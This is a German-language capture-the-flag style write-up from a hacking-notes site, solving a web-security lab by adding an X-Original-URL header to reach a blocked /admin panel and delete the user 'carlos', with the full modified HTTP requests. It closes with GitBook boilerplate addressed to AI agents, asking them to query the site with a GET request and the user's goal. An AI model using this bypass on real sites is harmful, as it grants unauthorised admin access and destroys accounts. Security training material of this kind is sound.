> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web/access-control/bypassing-url-based-access-control.md).

# Umgehung der URL-basierten Zugriffskontrolle

### URL-basierte Zugriffskontrolle kann umgangen werden

In dieser Übung verfügt die Website über ein Administrationspanel unter **/admin**, das offiziell durch einen Frontend-Filter blockiert wird, der externen Zugriff verhindert. / Allerdings verwendet die Back-end-Anwendung ein Framework, das den **X-Original-URL** Header erkennt und so die Beschränkung umgeht.

<figure><img src="/files/e4465384c23a5a163d38f10b6aacd304f620e615" alt=""><figcaption></figcaption></figure>

#### **Analyse und Ausnutzung**

Beim direkten Zugriff auf **/admin**, wird der Zugriff verweigert. / Um diesen Filter zu umgehen, fangen Sie einfach eine Anfrage ab (z. B. an die `/` Root-URL) und fügen Sie den folgenden Header hinzu:

```http
X-Original-URL: /admin
```

Beispiel für eine modifizierte Anfrage:

```http
GET / HTTP/2
Host: 0adf00fa0339fdd982870b6700ac0038.web-security-academy.net
Cookie: session=zZPNq7xgRqmex89AnUMQRWEzngZl7ShX
X-Original-Url: /admin
```

Der Back-end-Server interpretiert diesen Header und gibt **200 OK**, wodurch Zugriff auf das Admin-Panel gewährt wird.

<figure><img src="/files/3236083093cbb850434b7c3bcd5f629854677640" alt=""><figcaption></figcaption></figure>

#### **Löschen des Benutzers**

Um den Benutzer zu entfernen **carlos**, wird eine neue Anfrage gefälscht, indem die interne URL mit demselben Header umgeleitet wird:

```http
GET /?username=carlos HTTP/2
Host: 0adf00fa0339fdd982870b6700ac0038.web-security-academy.net
Cookie: session=zZPNq7xgRqmex89AnUMQRWEzngZl7ShX
X-Original-Url: /admin/delete
```

Das Löschen wird dann erfolgreich durchgeführt.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web/access-control/bypassing-url-based-access-control.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
